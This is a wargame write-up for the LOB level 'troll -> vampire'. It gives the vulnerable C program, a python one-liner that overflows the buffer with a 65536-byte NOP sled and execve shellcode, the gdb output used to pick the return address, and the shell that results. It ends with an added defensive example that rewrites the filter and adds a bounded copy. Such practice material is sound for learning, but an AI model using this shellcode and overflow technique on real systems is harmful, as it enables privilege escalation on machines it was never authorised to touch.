[LOB] troll -> vampire
2019. 7. 29. 01:28 · Wargame & CTF/LOB
```c
/*
	The Lord of the BOF : The Fellowship of the BOF
	- vampire
	- check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* for strcpy(); not included in the original listing */

main(int argc, char *argv[])
{
	char buffer[40];

	if(argc < 2){
		printf("argv error\n");
		exit(0);
	}

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

	// here is changed!
	if(argv[1][46] == '\xff')
	{
		printf("but it's not forever\n");
		exit(0);
	}

	strcpy(buffer, argv[1]);
	printf("%s\n", buffer);
}
```
Overflowing the buffer to overwrite RET would do it, but argv[1][46] must not be \xff; in other words, an address like 0xbfff0000 (the 0xbfffXXXX range) is not allowed.
The difference between 0xbffe0000 and 0xbfff0000 is 65536. Since the stack grows downward, putting 65536 NOPs in the payload and placing the address of a NOP that lands on the 0xbffe side into RET should work.
```
[troll@localhost tmp]$ ./vampire `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"+"\x90"*65536+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿1h//shh/bin⏓ኂ° ̀
Segmentation fault (core dumped)
[troll@localhost tmp]$ gdb -q vampire core
Core was generated by `'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0xbfbfbfbf in ?? ()
(gdb) x/80x $esp
0xbffefac0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefad0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefae0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefaf0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefb00:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefb10:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefb20:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefb30:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefb40:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefb50:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefb60:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefb70:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefb80:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefb90:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefba0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefbb0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefbc0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefbd0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefbe0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffefbf0:     0x90909090      0x90909090      0x90909090      0x90909090
```
So putting 0xbffefac0 into RET should work.
```
[troll@localhost troll]$ ./vampire `python -c 'print "A"*44+"\xc0\xfa\xfe\xbf"+"\x90"*65536+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAzþ¿1h//shh/bin⏓ኂ° ̀
bash$ my-pass
euid = 509
music world
```
vampire : music world
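As an added example (not from the original post or the LOB source), here is vampire's return-address filter rewritten as a pure function over the 48-byte prefix it inspects, next to a length-checked copy that removes the overflow itself instead of guessing at address bytes; the values 0xbffefac0 and 0xbfff0000 are the ones discussed above, and `build_prefix`, `safe_copy` and the 63-byte input are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 40   /* vampire's buffer[40] */
/* vampire's return-address filter as a pure function (added example, not the LOB
 * source). It looks only at bytes 46 and 47, the top two bytes of the little-endian
 * return address at argv[1][44..47]; returns 1 when strcpy() would be reached. */
int vampire_filter_accepts(const unsigned char *arg, size_t len)
{
    if (len <= 47)
        return 0;               /* original would read past the string here */
    if (arg[47] != 0xbf)
        return 0;               /* "stack is still your friend." */
    if (arg[46] == 0xff)
        return 0;               /* "but it's not forever" */
    return 1;                   /* anything 0xbf00.... to 0xbffe.... passes */
}

/* Hardened replacement for strcpy(): reject input that does not fit with its NUL,
 * so the return address can never be overwritten and no address heuristic is
 * needed. Returns bytes copied, or -1 when the input was rejected. */
int safe_copy(char *dst, size_t dst_len, const char *src)
{
    size_t n = strlen(src);
    if (n >= dst_len)
        return -1;
    memcpy(dst, src, n + 1);
    return (int)n;
}

/* Test helper: 44 filler bytes then `ret` little-endian, the layout the filter sees. */
void build_prefix(unsigned char out[48], unsigned int ret)
{
    memset(out, 'A', 44);
    for (int i = 0; i < 4; i++)
        out[44 + i] = (unsigned char)(ret >> (8 * i));
}

int main(void)
{
    unsigned char p[48];
    char dst[BUF_LEN], big[64];
    build_prefix(p, 0xbffefac0u);   /* address used in the writeup */
    printf("0xbffefac0 passes filter: %d\n", vampire_filter_accepts(p, sizeof p));
    build_prefix(p, 0xbfff0000u);   /* what the extra check blocks */
    printf("0xbfff0000 passes filter: %d\n", vampire_filter_accepts(p, sizeof p));
    memset(big, 'A', 63); big[63] = '\0';   /* constructed 63-byte input */
    printf("safe_copy(63 bytes) -> %d\n", safe_copy(dst, sizeof dst, big));
    return 0;
}
```

The filter accepts every address from 0xbf000000 up to 0xbffeffff, which is why a NOP sled large enough to straddle the 0xbffe/0xbfff boundary defeats it, whereas the bounded copy rejects the oversized argument before any return address is touched.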